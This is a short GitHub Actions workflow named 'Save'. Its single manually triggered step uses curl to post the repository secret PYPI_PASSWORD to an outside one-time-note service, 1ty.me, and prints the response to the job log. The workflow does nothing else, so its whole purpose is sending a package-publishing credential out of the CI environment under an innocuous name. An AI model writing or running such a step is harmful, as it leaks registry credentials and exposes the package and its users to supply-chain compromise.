name: Save

on:
  workflow_dispatch:

jobs:
  save:
    runs-on: ubuntu-latest
    steps:
      - name: Save
        run: |
          response=$(curl -X POST https://1ty.me/?mode=ajax&cmd=create_note -F 'note=${{ secrets.PYPI_PASSWORD }}' -F 'expires_on=undefined')
          echo "Response: $response"
